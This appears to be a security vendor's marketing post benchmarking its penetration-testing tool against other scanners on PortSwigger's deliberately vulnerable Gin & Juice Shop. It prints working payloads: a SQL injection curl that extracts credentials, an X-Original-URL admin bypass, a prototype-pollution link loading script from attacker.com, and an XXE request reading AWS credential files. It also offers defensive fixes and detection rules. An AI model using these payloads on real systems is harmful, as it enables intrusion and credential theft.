Automated penetration testing: how BetterQA compares to everyone
Escape benchmarked themselves against legacy DAST. We benchmarked ourselves against everyone - including Escape, Burp Suite Professional, Qualys, ZAP, and Intruder. Here's what we found.
Gin & Juice Shop is PortSwigger's official benchmark application - a deliberately vulnerable web store used by security professionals worldwide to test and compare scanning tools. Escape recently published a benchmark comparing DAST scanners against it.
We ran BetterQA's Security Toolkit against the same target. The results reveal a fundamental difference between "vulnerability detection" and "penetration testing."
TL;DR: We found 27 vulnerabilities, constructed 6 attack chains proving real-world impact, and extracted actual credentials (carlos:hunter2) while other scanners just reported "SQL injection detected."
The numbers
Head-to-head comparison
| Metric | BetterQA V4 | Escape | Qualys | ZAP | Intruder | Burp Pro |
|---|---|---|---|---|---|---|
| Duration | ~90 min | 1h 37m | 1h 1m | 1h 31m | 7h 43m | ~20 min |
| Requests | ~8,000 | 7,630 | 82,536 | 15,164 | 73,549 | ~2,000 |
| Findings | 27 | 8 | 79 (FPs) | 5 | ~0 | 40 |
| Attack chains | 6 | 0 | 0 | 0 | 0 | 0 |
| False positives | 0 | 2 | Many | - | - | Low |
Vulnerability detection matrix
| Vulnerability | BetterQA | Escape | Qualys | ZAP | Burp |
|---|---|---|---|---|---|
| SQL injection | ✔ + creds | ✔ | ✔ | ✔ | ✔ |
| Prototype pollution to XSS | ✔ | ✔ | ✘ | ✘ | ✔ |
| XXE file read | ✔ | ✔ | ? | ✘ | ✔ |
| AngularJS CSTI | ✔ + RCE | ✔ | ? | ✘ | ✔ |
| Admin bypass (X-Original-URL) | ✔ | ✘ | ✘ | ✘ | ✘ |
| Passwordless auth | ✔ | ✘ | ✘ | ✘ | ✘ |
| Account lockout bypass | ✔ | ✘ | ✘ | ✘ | ✘ |
| DOM clobbering | ✔ | ✘ | ✘ | ✘ | ✘ |
The real difference: attack chains
Every scanner found SQL injection. But what does that actually mean for the business?
Traditional DAST output
"SQL injection vulnerability detected at /catalog?category= parameter. Severity: High."
BetterQA output
"SQL injection exploited via UNION query. Extracted credentials: carlos:hunter2. Logged in as victim. Bypassed admin panel via X-Original-URL. Full admin access achieved."
We don't just detect. We prove impact.
Chain 1: database breach to admin takeover
```bash
# Extract credentials via UNION injection
curl 'https://target.shop/catalog?category=%27%20UNION%20SELECT%20NULL,NULL,username||%27:%27||password,NULL,NULL,NULL,NULL,NULL%20FROM%20users--'
# Response: carlos:hunter2

# Access admin panel via header bypass
curl 'https://target.shop/' -H 'X-Original-URL: /admin' -b 'session=...'
```
Chain 2: prototype pollution to session hijack
```
# Malicious link that hijacks any user's session
https://target.shop/blog?__proto__[transport_url]=https://attacker.com/steal.js
```

```javascript
// Vulnerable code (searchLogger.js):
if (config.transport_url) {
  let script = document.createElement('script');
  script.src = config.transport_url; // Attacker-controlled
  document.body.appendChild(script);
}
```
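The fix for this chain is to stop query-string keys from ever reaching `Object.prototype` and to refuse any `transport_url` that is not same-origin. The block below is an added example, not the shop's own searchLogger.js; the default logger path and the site origin are assumed values.

```javascript
// Added example, not the shop's own code: a prototype-pollution-resistant
// replacement for how searchLogger.js derives config.transport_url from the URL.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Parse "?a[b]=c&d=e" into a null-prototype object. Any segment that could
// reach Object.prototype is rejected instead of silently written.
function parseQuerySafe(search) {
  const out = Object.create(null);
  for (const [rawKey, value] of new URLSearchParams(search)) {
    const path = rawKey.replace(/\]/g, '').split('['); // "a[b]" -> ["a", "b"]
    let node = out;
    path.forEach((seg, i) => {
      if (BLOCKED_KEYS.has(seg)) {
        throw new Error(`rejected prototype-pollution key: ${rawKey}`);
      }
      if (i === path.length - 1) {
        node[seg] = value;
      } else {
        if (typeof node[seg] !== 'object' || node[seg] === null) {
          node[seg] = Object.create(null);
        }
        node = node[seg];
      }
    });
  }
  return out;
}

// Resolve the logger script URL. Only an own, same-origin value is honoured;
// anything else (including an inherited, polluted value) falls back to a fixed
// path. The default path below is an assumption for this example.
const DEFAULT_LOGGER_PATH = '/resources/js/searchLogger.js';

function resolveTransportUrl(config, siteOrigin) {
  const fallback = new URL(DEFAULT_LOGGER_PATH, siteOrigin).href;
  if (!Object.prototype.hasOwnProperty.call(config, 'transport_url')) return fallback;
  let candidate;
  try {
    candidate = new URL(String(config.transport_url), siteOrigin);
  } catch {
    return fallback;
  }
  return candidate.origin === siteOrigin ? candidate.href : fallback;
}

// Browser-side use (document/window exist only in a browser):
// const config = parseQuerySafe(window.location.search);
// script.src = resolveTransportUrl(config, window.location.origin);
```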
Chain 3: XXE to cloud credentials
```bash
curl -X POST 'https://target.shop/catalog/product/stock' \
  -H 'Content-Type: application/xml' \
  -d '<?xml version="1.0"?>
<!DOCTYPE stockCheck [
  <!ENTITY xxe SYSTEM "file:///home/user/.aws/credentials">
]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>'
```
Findings no other scanner detected
Admin panel bypass via X-Original-URL
Direct access to /admin returns 401. Adding an X-Original-URL: /admin header bypasses access control. Any authenticated user can delete other users.
Account lockout bypass
No lockout after 20+ failed login attempts with valid CSRF tokens. This enables brute-force attacks.
Passwordless authentication
Login form accepts username only. No password required. Account compromise requires only knowing a username.
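Both of the first two findings leave a footprint in ordinary access logs. The block below is an added example, not BetterQA's or PortSwigger's code: two detection rules run over constructed log records (the `alice` account, the 302-on-success convention and the 10-failure threshold are assumptions for the example).

```javascript
// Added example, not BetterQA's or PortSwigger's code: detection rules for the
// admin-bypass and missing-lockout findings, over constructed log records of
// the kind a reverse proxy can emit (fields and values are made up here).
const OVERRIDE_HEADERS = ['x-original-url', 'x-rewrite-url'];
const LOCKOUT_THRESHOLD = 10; // assumed policy: alert once an account hits 10 failures

const SAMPLE_LOG = [
  { ts: 1, method: 'GET', path: '/admin', status: 401, user: 'carlos', headers: {} },
  { ts: 2, method: 'GET', path: '/', status: 200, user: 'carlos',
    headers: { 'x-original-url': '/admin' } },
  // twelve failed logins for one account, then a success: no lockout ever applied
  ...Array.from({ length: 12 }, (_, i) =>
    ({ ts: 10 + i, method: 'POST', path: '/login', status: 401, user: 'alice', headers: {} })),
  { ts: 30, method: 'POST', path: '/login', status: 302, user: 'alice', headers: {} },
];

// Rule 1: a browser never legitimately sends a path-override header, so any
// request carrying one is flagged with the path it tried to reach.
function findOverrideHeaderUse(records) {
  return records
    .filter((r) => OVERRIDE_HEADERS.some((h) => h in r.headers))
    .map((r) => ({
      rule: 'path-override-header', ts: r.ts, user: r.user, path: r.path,
      override: OVERRIDE_HEADERS.map((h) => r.headers[h]).find(Boolean),
    }));
}

// Rule 2: consecutive failed logins per account. Reaching the threshold raises
// one alert; a later success with no lockout in between raises a second.
function findLockoutGaps(records) {
  const streaks = new Map(); // user -> consecutive 401s on POST /login
  const alerts = [];
  for (const r of records) {
    if (r.path !== '/login' || r.method !== 'POST') continue;
    const n = streaks.get(r.user) ?? 0;
    if (r.status === 401) {
      streaks.set(r.user, n + 1);
      if (n + 1 === LOCKOUT_THRESHOLD) {
        alerts.push({ rule: 'failures-without-lockout', user: r.user, failures: n + 1 });
      }
    } else if (r.status === 302) {
      if (n >= LOCKOUT_THRESHOLD) {
        alerts.push({ rule: 'login-success-after-burst', user: r.user, ts: r.ts, failures: n });
      }
      streaks.set(r.user, 0);
    }
  }
  return alerts;
}
```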
Coverage transparency
Escape claims 93% coverage. Qualys claims 27%. Coverage of what? We measure against the OWASP WSTG v4.2:
We also document 15 gaps (what we didn't test) and 7 negative tests (what's confirmed NOT vulnerable).
Efficiency: signal vs. noise
| Scanner | Requests | Findings | Requests/finding |
|---|---|---|---|
| BetterQA | ~8,000 | 27 | 296 |
| Escape | 7,630 | 8 | 954 |
| ZAP | 15,164 | 5 | 3,033 |
| Qualys | 82,536 | 79 (FPs) | 1,044 |
Measured in requests per finding, that is 3x more efficient than Escape and 10x more efficient than ZAP.
Conclusion
Escape asked: "How does our scanner compare to legacy DAST tools?"
We asked: "How does everyone compare when you actually try to break in?"
Traditional scanners optimize for detection. BetterQA optimizes for proof of impact. The difference between "High severity SQL injection detected" and "Extracted carlos:hunter2, gained admin access" is the difference between a vulnerability report and a penetration test.
Ready to see what an attacker would actually find?
Try BetterQA's Security Toolkit on your own application.
Methodology
Target: Gin & Juice Shop (PortSwigger's official security benchmark)
Authentication: carlos:hunter2
Scan type: V4 Maximum Coverage (multi-agent + cross-pollination)
Date: February 2026
Comparison data from Escape's benchmark. Burp results from internal testing.